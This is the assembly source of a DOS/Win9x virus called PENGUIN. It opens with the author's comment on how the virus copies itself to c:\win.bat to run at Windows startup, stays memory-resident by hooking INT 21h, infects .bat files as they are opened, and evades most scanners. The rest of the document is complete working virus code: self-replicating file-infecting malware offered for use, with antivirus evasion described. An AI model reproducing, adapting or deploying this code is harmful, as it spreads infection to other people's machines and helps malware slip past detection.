title                               PENGUIN

comment # ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O


How it works:
 - batch part
  if name of executed batch <> win then copy itself to c:\win.bat and
  continue the normal execution, else copy itself to w.com, run w.com,
  delete w.com, launch the real win.com.
  the win9x command.com launches c:\win.bat before the real one in the path,
  at the end of autoexec.bat.
 - .com part
  become TSR, try to infect .bat filez on open, change PSP owner to dos.
  check for previous infection.
  avoid autoexec.bat.

The advantage is that the viral code is only in .bat files, not scanned for
viral source code. Only detected by DrWeb.

Credits for Q the Misanthrope and his Winstart virus for the good ideas.


                                             >>  mandragore! <

ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O*ù*O #



.model tiny
.code
.386
bptr    equ <byte ptr>
wptr    equ <word ptr>
dptr    equ <dword ptr>
virsiz  equ eof-comorg
        org 100h
Start:

part1   db ':0'
        jmp comorg
        db 13,10
        db '@if %0==win goto win',13,10
        db '@copy %0.bat c:\win.bat >nul',13,10
part1sz equ $-part1

part2   db '@goto eof',13,10
        db ':win',13,10
        db '@copy %0.bat w.com >nul',13,10
        db '@w',13,10
        db '@del w.com',13,10
        db '@windows\win',13,10
        db ':eof',13,10
        db '@echo >nul'
part2sz equ $-part2

comorg:
        call delta
delta:  pop bp
        sub bp,offset delta
        xor ax,ax
        int 15h
        jnc comorg

        lea ax,bp+part2
        mov [bp+adrpt2],ax
        mov es,ds:[2ch]
        mov ah,49h
        int 21h

        mov ax,cs
        shl eax,16              ;  chain ints
        lea ax,hook21
        push 0
        pop ds
        xchg eax,ds:[84h]
        mov [bp+old21],eax

        lea dx,eof
        int 27h                 ;  stay TSR

hook21: pushf
        cmp ah,3dh
        je job
        cmp ah,4dh
        je hide
back21: popf
        db 0eah
old21   dd ?

hide:   push ax ds
        mov ax,cs
        dec ax
        mov ds,ax
        mov wptr ds:[1],8
        pop ds ax
        jmp back21

job:    push ax bx cx dx si di
        push ds
        mov cx,dx
        mov si,dx
        add dl,30h
        cld
bcl:    cmp si,dx
        je eoj
        lodsb
        cmp al,'.'
        jne bcl
        lodsd
        cmp eax,0+'tab'
        je okbat
        cmp eax,0+'TAB' ;  .bat ?
        jne eoj
okbat:  std
        lodsd
        lodsd
        lodsd
        cld
        cmp eax,'.cex'  ;  *xec.bat ?  (avoid autoexec.bat)
        je eoj
        mov dx,cx
        mov ax,3d02h
        pushf
        call dword ptr cs:[old21]
        jc eoj
        xchg ax,bx
        push cs
        pop ds

        mov ax,4202h
        xor cx,cx
        cwd
        int 21h
        or dx,dx
        jnz no_inf
        cmp ax,999               ;  too big?
        ja no_inf
        
        mov di,ax               ;  di = file size
        xor cx,cx
        mov ax,4200h
        int 21h

        call next
buff    db 1000 dup(0)
next:   pop dx
        mov si,dx               ;  si = offset buff
        mov ah,3fh
        mov cx,di
        int 21h
        cmp wptr [si],':0'      ;  already infected?
        je no_inf
        xor cx,cx
        cwd
        mov ax,4200h
        int 21h

        mov ax,part1sz+part2sz-5
        add ax,di
        mov ds:[103h],ax

        mov cx,part1sz
        mov dx,100h
        mov ah,40h              ;  write 1st part
        int 21h

        mov ah,40h
        mov dx,si
        mov cx,di               ;  write old bat
        push ax
        int 21h

        mov cx,eof-part2
        mov dx,0
        org $-2                 ;  write 2nd part
adrpt2  dw 0
        pop ax
        int 21h

no_inf: mov ah,3eh
        int 21h
eoj:    pop ds
        pop di si dx cx bx ax
        jmp back21

;------------  datas

eof:
end start